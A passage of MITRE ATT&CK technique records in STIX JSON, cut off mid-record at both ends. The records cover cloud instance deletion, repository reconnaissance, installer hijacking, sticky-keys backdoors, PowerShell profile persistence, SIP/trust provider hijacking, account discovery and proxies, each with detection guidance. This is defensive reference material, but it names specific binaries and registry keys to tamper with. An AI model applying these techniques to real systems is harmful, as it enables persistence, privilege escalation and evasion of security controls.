[{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4", "created": "2020-06-16T17:23:06.508Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1578/003", "external_id": "T1578.003"}, {"source_name": "Mandiant M-Trends 2020", "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020"}, {"source_name": "AWS CloudTrail Search", "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.", "url": "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/"}, {"source_name": "Azure Activity Logs", "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.", "url": "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs"}, {"source_name": "Cloud Audit Logs", "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020.", "url": "https://cloud.google.com/logging/docs/audit#admin-activity"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-10-26T18:01:20.520Z", "name": "Code Repositories", "description": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. \n\nAdversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). \n\n**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "3.0.0", "x_mitre_contributors": ["Matt Burrough, @mattburrough, Microsoft", "Vinayak Wadhwa, SAFE Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. \n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--70910fbd-58dc-4c1c-8c48-814d11fcd022", "created": "2022-08-09T13:01:43.314Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1593/003", "external_id": "T1593.003"}, {"source_name": "GitHub Cloud Service Credentials", "description": "Runa A. Sandvik. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved August 9, 2022.", "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2020-10-27T14:49:39.188Z", "name": "Executable Installer File Permissions Weakness", "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire", "Stefan Kanthak"], "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["Administrator", "User", "SYSTEM"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", "created": "2020-03-13T11:12:18.558Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/005", "external_id": "T1574.005"}, {"source_name": "mozilla_sec_adv_2012", "description": "Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.", "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/"}, {"source_name": "Executable Installers are Vulnerable", "description": "Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.", "url": "https://seclists.org/fulldisclosure/2015/Dec/34"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Accessibility Features", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Paul Speulstra, AECOM Global Security Operations Center"], "x_mitre_deprecated": false, "x_mitre_detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "created": "2020-01-24T14:32:40.315Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/008", "external_id": "T1546.008"}, {"source_name": "Narrator Accessibility Abuse", "description": "Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.", "url": "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html"}, {"source_name": "FireEye Hikit Rootkit", "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.", "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html"}, {"source_name": "DEFCON2016 Sticky Keys", "description": "Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017.", "url": "https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom"}, {"source_name": "Tilbury 2014", "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.", "url": "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "PowerShell Profile", "description": "Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Allen DeRyke, ICE"], "x_mitre_detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--723e3a2b-ca0d-4daa-ada8-82ea35d3733a", "created": "2019-06-14T18:53:49.472Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1504", "external_id": "T1504"}, {"source_name": "Microsoft About Profiles", "description": "Microsoft. (2017, November 29). About Profiles. Retrieved June 14, 2019.", "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6"}, {"source_name": "ESET Turla PowerShell May 2019", "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.", "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/"}, {"source_name": "Wits End and Shady PowerShell Profiles", "description": "DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege Elevation using the Powershell Profile. Retrieved July 8, 2019.", "url": "https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html"}, {"source_name": "Malware Archaeology PowerShell Cheat Sheet", "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "SIP and Trust Provider Hijacking", "description": "In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP\u2019s CryptSIPDllVerifyIndirectData function, which validates a file\u2019s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider\u2019s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP\u2019s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matt Graeber, @mattifestation, SpecterOps"], "x_mitre_detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \u201cHide Microsoft Entries\u201d and \u201cHide Windows Entries\u201d are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Application whitelisting", "Autoruns Analysis", "Digital Certificate Validation", "Process whitelisting", "User Mode Signature Validation"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--72b5ef57-325c-411b-93ca-a3ca6fa17e31", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1198", "external_id": "T1198"}, {"source_name": "Microsoft Authenticode", "description": "Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.", "url": "https://msdn.microsoft.com/library/ms537359.aspx"}, {"source_name": "Microsoft WinVerifyTrust", "description": "Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx"}, {"source_name": "SpectorOps Subverting Trust Sept 2017", "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"}, {"source_name": "EduardosBlog SIPs July 2008", "description": "Navarro, E. (2008, July 11). SIP\u2019s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.", "url": "https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/"}, {"source_name": "Microsoft Catalog Files and Signatures April 2017", "description": "Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.", "url": "https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files"}, {"source_name": "GitHub SIP POC Sept 2017", "description": "Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.", "url": "https://github.com/mattifestation/PoCSubjectInterfacePackage"}, {"source_name": "Entrust Enable CAPI2 Aug 2017", "description": "Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.", "url": "http://www.entrust.net/knowledge-base/technote.cfm?tn=8165"}, {"source_name": "Microsoft Registry Auditing Aug 2016", "description": "Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)"}, {"source_name": "Microsoft Audit Registry July 2012", "description": "Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-01-12T23:36:56.245Z", "name": "Account Discovery", "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system\u2019s files.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Daniel Stepanic, Elastic", "Microsoft Threat Intelligence Center (MSTIC)", "Travis Smith, Tripwire"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "created": "2017-05-31T21:31:06.988Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1087", "external_id": "T1087"}, {"source_name": "AWS List Users", "description": "Amazon. (n.d.). List Users. Retrieved August 11, 2020.", "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html"}, {"source_name": "Google Cloud - IAM Servie Accounts List API", "description": "Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.", "url": "https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list"}, {"source_name": "Elastic - Koadiac Detection with EQL", "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Proxy", "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jon Sheedy", "Heather Linn", "Walker Johnson"], "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "3.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "created": "2017-05-31T21:31:08.479Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1090", "external_id": "T1090"}, {"source_name": "Trend Micro APT Attack Tools", "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, 